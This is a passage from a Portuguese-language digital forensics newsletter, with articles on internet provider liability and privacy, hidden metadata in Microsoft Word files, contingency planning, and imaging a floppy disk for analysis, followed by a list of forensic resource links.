relacionamento com os provedores e sites. A busca por maior segurana no meio eletrnico, as polticas preventivas das empresas pontocom e a necessidade de identificao para fins de responsabilizao por condutas reprovveis so temas importantes para a atual realidade da Internet. Estes temas, entretanto, chocam com questo da privacidade e do sigilo das informaes pessoais. No temos dvidas que a palavra privacidade, nos ltimos

tempos, est cada vez mais sendo utilizada e suas propores so muito maiores do que h alguns anos. Privacidade e sigilo so direitos garantidos por nossa Constituio e em importantes tratados internacionais, j ratificados pelo Brasil. Ambos se relacionam com informaes estratgicas, identificadoras e individualizadoras das pessoas fsicas e jurdicas. Como ponderar a necessidade de maior segurana com a questo da Privacidade e do sigilo, ainda , e por um bom tempo ser, uma dvida latente. E, em especial, existe a dvida se os dados identificadores com IP, registro de logs, contas d ee mail so de fato passveis de proteo baseada na privacidade e no sigilo assim, como assim ocorre no caso das correspondncias e das comunicaes telegrficas. d) Detentores das informaes O papel dos provedores e dos sites Rastrear o e-mail que enviou mensagem ilcita, de carter desonroso ou ameaador, detectar quem foi o responsvel pela violao dos direitos autorais e outros exemplos corriqueiros dependem de um elemento essencial: o provedor de Internet. Os provedores so os que mais esto preocupados com tal tema, tendo em vista os gastos elevados para atuar de acordo com as disposies legais. De fato, aps a entrada em vigor do Novo Cdigo Civil, e com a adoo completa da Teoria do Risco do artigo 927, pargrafo nico, os provedores passaram a se preocupar com a questo da identificao e, principalmente, com a possibilidade de serem chamados em juzo ou notificados para prestarem informaes sobre eventos ocorridos dentro de seus sistemas. Os provedores devem conter bancos de dados suficientes para armazenar os dados de todos aqueles que se conectam ao seu servio. E diante do conselho de especialistas, os provedores devero armazen-los por tempo mnimo de trs anos. E, neste sentido, no h como negar que, sem a atuao do provedor no f rnecimento de dados, haveria o sim, a impunidade na Internet, e muitos casos ficariam sem efeito. A dificuldade na questo est pautada em 2 aspectos gerais que so utilizados como argumentos pelos provedores: o sigilo garantido pela Constituio de 1998 e a privacidade do fluxo da informao. E como a privacidade um dos temas que ganharam dimenses enormes na Internet sob este argumento e baseados na legislao sobre interceptao de fluxo que as empresas provedoras evitam a disponibilizao das informaes requeridas.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

12

Entretanto, a opinio de que tais dados infrinjam tal legislao no parece acertada, principalmente quando pautados na necessidade da prestao jurisdicional. Isto no significa que os provedores atuam condizentes com a criminalidade crescente na Internet, mas que se utilizam tais argumentos para salvaguardar as informaes de seus usurios. Desta forma, havendo necessidade, e aps tal demonstrao, os provedores devero sim, disponibilizar dados que comprovem a autoria, ou seja, quem estava utilizando o computador e praticou a conduta, sob pena de se aplicar s sanes determinadas pela responsabilidade objetiva, tendo em vista a atividade que exercem. Neste paradigma, atualmente, para haver a devida prestao jurisdicional, o autor dever ingressar com ao prpria contra os provedores para obter primeiramente os dados, caso mediante outros meios estes no sejam fornecidos. A responsabilidade objetiva dos provedores se d a partir da notificao. Sabendo da consulta e da necessidade de disponibilizaro, este se vincularia ao autor numa relao de responsabilidade civil, de carter indenizatrio, pelos danos decorrentes da falta da informao necessria para propositura de demanda contra o autor da conduta lesiva. Uma legislao neste sentido facilitaria o trabalho e diminuiria os custos para as partes. Esta deveria ser pautada na fundamentada necessidade de disponibilizao da informao. Assim, comprovando o dano, estas poderiam ser fornecidas. Da mesma forma ocorre com os sites que devem guardar os dados de seus usurios para eventuais litgios. No h duvidas de que este posicionamento ensejar, num futuro prximo, a exigncia dos sites de que seus usurios, antes de ter acesso ao seu contedo, se loguem. O principio da responsabilidade objetiva aplica-se tambm e da mesma forma, aos sites. Estas questes supracitadas cada vez mais sero discutidas e em breve dever ser elaborado projeto de lei a respeito. E a exemplo de outros pases, precisamos garantir segurana jurdica na Internet com uma juno de normas jurdicas e tcnicas para o controle daqueles que utilizam mal a tecnologia visando vantagens indevidas. E a Internet ser mais confivel quando as pessoas souberem utiliz-la com bom senso e quando se prevalecerem da sensao de estarem annimas para aumentarem seus relacionamentos de forma positiva e que haja, sim, responsabilizao dos eventos provenientes do meio eletrnicos. E que principalmente, os usurios tenham a conscincia que privacidade na Internet estar cada vez mais restrita e que seus dados, seu perfil, sua conduta em

algum lugar ficar registrada e por algum, que poder utiliz-la no caso de litgio. Utilizar o computador com bom senso, conscincia e boa-f so requisitos para um convvio seguro com as novas tecnologias.

Carolina de A. V. Chaves (carolina_chaves@ig.com.br)

Aluna do 5o. ano da Faculdade de Direito da Universidade Presbiteriana Mackenzie, Administradora e Membro do Grupo de Estudos em Comrcio Eletrnico do Instituto Fran Martins, Colaboradora da revista eletrnica 2bnews e do site Feiras do Brasil, colunista do site Direito na Web, Membro do Conselho de Comrcio Eletrnico da Federao do Comrcio do Estado de So Paulo, Membro do Ncleo de Desenvolvimento Acadmico da OAB/SP, Membro do Grupo de Pesquisa em Lex Mercatoria do Instituto de Pesquisa em Comrcio Internacional Tecnologia da Informao e Desenvolvimento (CITTED);Palestrante no II Congresso de Direito Eletrnico da Universidade Mackenzie; Estagiou no Opice Blum Advogados Associados, no Portal 2bexpo "All Business Network" e na Procuradoria de Assistncia Judiciria.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

13

ESCUBRA O QUE H DENTRO DE UM DOCUM ENTO DO M ICROSOFT WORD

Andrey Rodrigues de Freitas

Atravs de um Editor Hexadecimal (WinHex ( igura 1) f ou HView 2000 ( figura 2)) ou de um simples editor de textos (NotePad por exemplo) possvel encontrar dados ocultos dentro de um arquivo do Microsoft Word, muitas vezes essas informaes so interessantes e importantes em uma investigao, estes dados ocultos so conhecidos como MetaDatas.

Por motivos de segurana o governo Britnico abandou o uso do Microsoft Word em favor do formato PDF.

Figura 2

Figura 1

Para demonstrao dos dados ocultos, c um documento riei no Word 2000 e escrevi um pequeno texto. Iremos agora analisar as informaes encontradas neste documento:

................p........................f............. ..f..........0..........f.......w...............w.......f..... ......................................................... Teste de Exemplo............ Fragmento 1 Anlise 1: Dentro do documento encontramos o texto que escrevi, "Teste de Exemplo", podemos observar que o texto est em um formato legvel mesmo visualizando-o em um Editor Hexadecimal e que no necessrio se ter o MS Word para saber o que h dentro de um documento. .8..@..8.....N.o.r.m.a.l.........CJ.._H.. aJ..mH..sH..tH....................6.A@.6.....F.o.n.t.e. .p.a. r..g... .p.a.d.r..o...................................... ...0.......................................................... ....................................A.n.d.r.e.y. .R.o.d.r.i.g. u.e.s...D.:.\.E.x.e.m.p.l.o.1...d.o.c.@..................... .........................@....@........U.n.k.n.o.w.n........ .................................G..............z. . .................T.i.m.e.s. .N.e.w. .R.o.m.a.n...5........... ..........................S.y.m.b.o.l...3&.............z. ... ...............A.r.i.a.l..."...1...........s{s{....... ...............................................!............... Fragmento 2 Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

14

Anlise 2: Neste pedao de cdigo encontramos algumas informaes muito interessantes!

"F.o.n.t.e. .p.a.r..g... .p.a.d.r..o." = Fonte e Pargrafo do texto no modo padro. "A.n.d.r.e.y. .R.o.d.r.i.g.u.e.s..." = Autor do documento (essa informao muito importante em uma anlise pericial). "D.:.\.E.x.e.m.p.l.o.1...d.o.c." = Local onde o documento foi criado (D:\) e o nome do documento (Exemplo1.doc).

Em algumas verses anteriores do MS Word, a Microsoft armazenava tambm dentro do documento o endereo MAC da placa de rede, e atravs deste descuido sabamos exatamente qual mquina tinha criado o documento! Podemos tambm descobrir atravs do Editor Hexadecimal a senha utilizada para proteger o documento como "Somente Leitura".

.........T.e.s.t.e. .d.e. .E.x.e.m.p.l.o. .1...T.e.s.t.e...T.e.s .t.e.,. .E.x.e.m.p.l.o.,. .1.....A.n.d.r.e.y. .R.o.d.r.i.g.u.e.s ...A.n.d.r.e.y. .R.o.d.r.i.g.u.e.s. Fragmento 3 Anlise 3: Neste fragmento encontramos algumas informaes referentes s Propriedades do documento (ver : Menu Arquivos -> Propriedades do MS Word). Onde:
"T.e.s.t.e. .d.e. .E.x.e.m.p.l.o. .1" = Ttulo do documento. "T.e.s.t.e" = Assunto do documento. "T.e.s.t.e.,. .E.x.e.m.p.l.o.,. .1" = Palavras-Chave. "A.n.d.r.e.y. .R.o.d.r.i.g.u.e.s" = Autor do documento.

...............Teste de Exemplo 1..........Teste.de........Andr ey Rodrigues.1..........Teste, Exemplo, 1...........Sem comentr ios.........Normal.dot.r........Andrey Rodrigues............1.dr ........Microsoft Word 9.0..@....G....@....~.@.....*. Fragmento 4

Anlise 4: Encontramos em uma outra parte as mesmas informaes anteriores e tambm algumas novas...
"Normal.dot" = Documento Modelo. "Sem comentrios" = Comentrios. "Microsoft Word 9.0" = Microsoft Word 2000.

.No clas sificado..p.........Eu mesmo.ifi........ARF Inf..ifi............ ............................................................... Teste de Exemplo 1.................Ttulo. Fragmento 5

Anlise 5: Em um outro local do documento encontramos a complementao das propriedades do arquivo.

"No classificado" = Categoria. "Eu mesmo" = Gerente. "ARF Inf" = Empresa.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

15

Observao 1: Fiz uma alterao no texto do d ocumento e o salvei com outro nome, vejamos se alguma alterao aconteceu em sua estrutura e se possvel encontrar alguma outra informao importante...

........i.............8..@..8.....N.o.r.m.a.l.........CJ.._H.. aJ..mH..sH..tH....................6.A@.6.....F.o.n.t.e. .p.a. r..g... .p.a.d.r..o...................................... ...0.......................................................... ....................................A.n.d.r.e.y. .R.o.d.r.i.g. u.e.s...D.:.\.E.x.e.m.p.l.o.1...d.o.c...A.n.d.r.e.y. .R.o.d.r.i. g.u.e.s...D.:.\.E.x.e.m.p.l.o.2...d.o.c.@............t....... ...........................P....@........U.n.k.n.o.w.n...... ...................................G..............z. ..................T.i.m.e.s. .N.e.w. .R.o.m.a.n...5......... ............................S.y.m.b.o.l...3&.............z. . .................A.r.i.a.l..."..............s{s{..... Fragmento 6

Anlise 6: Apareceu um outro arquivo nas informaes ocultas ? Na verdade o que aconteceu foi que o usurio Andrey Rodrigues criou um documento no drive D com o nome de Exemplo1.doc, depois o mesmo usurio alterou o documento e o salvou com o nome de Exemplo2.doc, pelo que podemos observar o MS Word rastreia o documento.

Observao 2: Fiz uma outra alterao, alterei o documento e o salvei (salvar como..) em um outro diretrio, vejamos se o Word rastreou as alteraes...

A.n.d.r.e.y. .R.o.d. r.i.g.u.e.s...D.:.\.E.x.e.m.p.l.o.1...d.o.c...A.n.d.r.e.y. .R.o. d.r.i.g.u.e.s...D.:.\.E.x.e.m.p.l.o.2...d.o.c...A.n.d.r.e.y. .R. o.d.r.i.g.u.e.s...D.:.\.L.i.x.o.\.E.x.e.m.p.l.o.3...d.o.c. Fragmento 7 Anlise 7: Sim, rastreou. Salvei o documento com o nome de Exemplo3.doc dentro do diretrio D:\Lixo. Por padro o Microsoft Word guarda os dados das 10 ltimas alteraes sofridas pelo documento.

Concluso: Cada vez que voc alterar e salvar o documento em lugares diferentes o Word ir rastre-lo (guardar as informaes por onde ele passou, seus nomes e usurios). Mas se voc no quer que terceiros descubram informaes sobre os seus documentos ou sobre voc, s h uma recomendao: deixar de utilizar o Microsoft Word. O Governo Britnico deixou de usar o MS Word porque publicou um documento em formato Word, sobre a evidncia de armas de destruio em massa no Iraque. Mas atravs dos MetaDatas se demonstrou que o informe era na realidade um plgio de antigas publicaes.

Andrey Rodrigues de Freitas (periciaforense@yahoo.com.br)

Graduado em Processamento de Dados, ps-graduado em Computao Aplicada e ps-graduado em Internet Security (Advanced School of Internet Security). Criador / moderador do Grupo Percia Forense Aplicada Informtica.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

16

M PERFECTION IN THE SYSTEM

Leonildo Junior

Todos os sistemas possuem falhas, e tudo um sistema, por isso vamos esquecer a iluso de que sistema tem haver, apenas, com a rea da informtica e abrir os olhos para o verdadeiro sentido. Quando voc chega ao escritrio, talvez no perceba nada, mas l existe um sistema. Experimente parar e olhar ao seu redor, sempre que chegar ao trabalho, vai perceber que muitas coisas so iguais todos os dias. No quero falar sobre moblia, refirome ao comportamento das pessoas. Fulana sempre sentada ao lado de fulano, algum sempre fazendo fofoca e outro sempre fumando um cigarro na varanda. Joo sempre anda junto com Paulo e assim vai, tudo um sistema, precisamos dele para que a vida prossiga sem problemas. Problemas como estes podem arruinar anos de trabalho, pode fazer pessoas perderem empregos e, dependendo da importncia do sistema para a organizao, fazer organizaes irem a falncia. Mais no chore ainda, nem tudo so espinhos, existe um mtodo chamado plano de contingncia. Plano de contingncia vulgo Plano de Recuperao de Desastres (Disaster Recovery Plan - DRP) o mesmo que estabelecer regras para agir em caso de uma Imperfection in the system. Por exemplo: Voc tem um sistema que cadastra os clientes e registra as vendas da sua loja, toda venda precisa ser registrada e todos os clientes novos tambm. atravs deste sistema que voc gera o boletos de pagamento s e a nota fiscal para o cliente. O controle de pagamento a prazo feito tambm neste programa informatizado que voc tem nos computadores. Um vrus de computador afeta sua rede e impossibilita a utilizao deste sistema, e agora? Como prosseguir com as vendas, uma vez que elas eram registradas no sistema que falhou ou pior, voc perdeu o controle de pagamentos e ao sabe quem deve lhe pagar e quando deve. ai que entra o Plano de Contingncia, se voc tivesse um backup, atualizado, do seu sistema gravado em um CD, um formulrio, em papel, para cadastro de clientes e um para controle de vendas, boletos e nota fiscal para preenchimento manual. Com todas essas precaues voc no teria problema, quando ocorresse uma

Imagine que voc tenha que digitar todos os relatrios de vendas mensais, pois de alguma forma a pasta suspensa que continha os arquivos sumiu, ou melhor, imagine a perda que voc teria se algum roubasse o seu caderninho de anotaes que servia para anotar as vendas para pagamento futuro? Quando falei em problemas no me referi apenas a roubos ou perdas, pense em incndios que podem queimar em segundos anotaes e arquivos de anos. Que pnico que seria heim? Qual a relao disto com sistemas? Pensa um pouco na breve descrio de sistemas que deixei no inicio do texto. Ao arquivar todos os relatrios em uma pasta suspensa e guardar em um armrio voc esta executando o seu sistema, sistema , em uma descrio bem mesquinha, um padro para se fazer as coisas, e um incndio, perda, roubo ou qualquer coisa que lhe impossibilite de executar os procedimentos normais o que eu chamo de Imperfection in the system ou simplesmente Falha no Sistema.

Imperfection in the System voc poderia prosseguir suas atividades e depois registrar tudo no computador quando o problema no sistema fosse solucionado. Apesar de parecer complicado e palavras, criar um plano de contingncia simples, muitas vezes voc o faz sem perceber. Quando voc sai de casa para o trabalho, voc sabe que vai gastar apenas R$ 3,00 reais com o transporte, mais voc leva R$ 10,00 reais mesmo sem expectativa nenhuma de utilizar este dinheiro, voc esta sendo precavido. Se o nibus quebrar no caminho e voc estiver to atrasado que no poder se dar ao luxo de esperar que o cobrador pare outro nibus para levar voc ao destino sem pagar outro transporte? Vamos analisar esta situao, voc faz parte de um sistema, todos os dias voc sai de casa para ir ao trabalho, para chegar l voc precisa pegar a conduo, paga o valor estabelecido e ela leva voc ao trabalho. Este sistema, como vrios outros, baseado em meios, metas e prazos, voc precisa chegar ao trabalho, esta sua meta, voc pega um nibus, este o meio utilizado para alcanar sua meta, voc precisa estar l as 8:00h e este o seu prazo. No seu sistema normal voc pega o nibus das 7 horas chega as 8 em ponto, tudo de acordo com seu prazo, mas o nibus quebra e voc

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

17

vai se atrasar, ou seja, vai chegar depois do prazo estabelecido para cumprir sua meta. A mensagem que aparece na sua tela mental Imperfection in the System e agora? ai que entra o seu Plano de Contingncia, a sua contra medida se preferir, voc saiu de casa com um dinheiro a mais que o necessrio para fazer o seu sistema funcionar, voc estava prevendo, mesmo que de forma inconsciente, uma falha no sistema. Elas

ocorrem sempre por que qualquer sistema possui falhas e tudo um sistema, ento voc precisa estar sempre preparado com um Plano de Recuperao de Desastres. Para finalizar vai uma dica: Nunca deixe o seu plano de contingncia desatualizado e nunca deixe ele no disco rgido de um computador pois seno voc ter que criar um plano para o seu plano de contingncia e depois um plano do plano e por ai vai...

Leonildo Junior (leonildojunior@yahoo.com.br)

Estudante, nvel tcnico de informtica, Escola Baiana de Cincias e Tecnologias.

O Informativo Direito Eletrnico uma publicao on-line sobre temas do Direito na Internet, promovida pela Comisso de Estudos e Pesquisa Cientfica em Direito nos Meios Eletrnicos da Faculdade de Direito Mackenzie. Cadastro para recebimento no email mackcomel@ig.com.br Apoio Institucional : CBEJI e Comunidade Alfa-Redi Equipe Editorial Contedo Editorial/Diagramao : Carolina Chaves Reviso : Karina Fiorini e Marcella Costa Colaboradores : Membros da Comisso de Estudos do Mackenzie Professora Orientadora : Juliana Canha Abrusio

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

18

ERCIA EM DISQUETE Parte 1

Andrey Rodrigues de Freitas

Este primeiro artigo ir demonstrar como criar a imagem de um disquete (floppy drive) para posterior anlise. Para a criao de uma imagem de um HD (hard drive) voc poder seguir os mesmos procedimentos usados neste exemplo.

Mas por que criar uma imagem ? necessria a criao de uma imagem para que a prova no seja destruda caso algum descuido acontea, mas se chegar a acontecer algum problema com as informaes da imagem os nicos dados perdidos seriam os do disquete clonado e no a prova verdadeira. Para a criao de uma imagem imprescindvel o uso de um software especial. Para este exemplo utilizaremos o GetDataBack for FAT da Runtime Software.

Figura 1

Imaginemos agora a seguinte situao: voc um perito em informtica (participou de uma mega-operao que culminou com o fechamento de sites em mais de 10 pases, com prises de diversas pessoas e apreenso de uma quantidade enorme de equipamentos, incluindo computadores, notebooks, vdeos e fotos) e recebe a misso de analisar um determinado disquete.

Este disquete j passou pelas mos de vrias pessoas e todas chegaram concluso de que no h nada dentro dele, iremos analis-lo e tentaremos provar que nem sempre o que no se v no quer dizer que no exista.

Criando a imagem do disquete Utilizando o Windows Explorer (observe a figura 1) notamos que no h nada dentro do disquete. Fizemos a mesma verificao atravs do prompt do MS DOS (figura 2) e realmente no aparenta haver nada.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

19

Figura 2

Inicie o GetDataBack for FAT (h tambm uma verso para NTFS), selecione o Drive que ir ser clonado (figura 3), que no nosso caso ser o FD0 (1 drive de disquete) e clique no boto Next.

Figura 3

No passo 2 (Step 2 : Select Source) (figura 4), o sistema ir analisar o drive escolhido (1st floppy drive 1.44 MB (FD0)) e apresentar informaes sobre o disquete na parte direita da tela.

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

20

Figura 4

Nesta mesma tela do passo 2, selecione o Menu Tools (figura 5) e escolha a opo Create image file..., abrir uma tela para que voc d um nome para a imagem a ser criada, que no nosso exemplo se chamar Disquete.img (figura 6).

Figura 5

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

21

Pronto, agora s esperar o sistema criar a imagem do disquete para que possamos analis-la. Observe que na figura 7 o GetDataBack informa qual o drive que est sendo clonado ( rom : FD0) e onde a cpia F est sendo criada ( o : D :\Assuntos_Livro\ T ...\Teste3...), anote este endereo para que possamos analisar o arquivo mais tarde.

Concluso Nesta primeira parte do artigo aprendemos como criar uma cpia (imagem) de um disquete que foi apreendido para anlise, no prximo artigo analisaremos a cpia e veremos se realmente no h nada dentro deste disquete. At o prximo nmero da Evidncia Digital.
Figura 6

Link : Runtime Software http://www.runtime.org

Andrey Rodrigues de Freitas (periciaforense@yahoo.com.br)

Graduado em Processamento de Dados, ps-graduado em Computao Aplicada e ps-graduado em Internet Security (Advanced School of Internet Security). Criador / moderador do Grupo Percia Forense Aplicada Informtica.

Figura 7

Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

22

INKS
: Access Data
Softwares para computao forense. http://www.accessdata.com

: Cyber Tools On-Line Search for Evidence

CTOSE um projeto de pesquisa financiado pelo Comisso Europia. http://www.ctose.org

: Forensics Explorers
Computao forense. http://www.forensicsexplorers.com

: Forensic Technology
Informaes sobre hardware e software. http://www.forensic-technology.com

: IBP Brasil
Instituto Brasileiro de Peritos em Comrcio Eletrnico e Telemtica. http://www.ibpbrasil.com.br

: IPDI
Instituto de Peritos em Tecnologias Digitais e Telecomunicaes. http://www.ipdi.com.br

: Intelligent Computer Solutions - Forensics

Solues para clonagem de software e diagnstico de sistemas. http://www.icsforensic.com

: Mares and Company

Software, servios e treinamentos em computao forense. http://www.maresware.com

: pcForensics
Computao forense, recuperao de dados e servios de percias. http://www.pcforensics.com

: Recover my Files
Recupere seus arquivos perdidos. http://www.recovermyfiles.com

: X-Ways Software Technology AG

Criador do WinHex (editor hexadecimal). http://www.x-ways.net/index-m.html Percia Forense Aplicada Informtica http://br.groups.yahoo.com/group/PericiaForense

23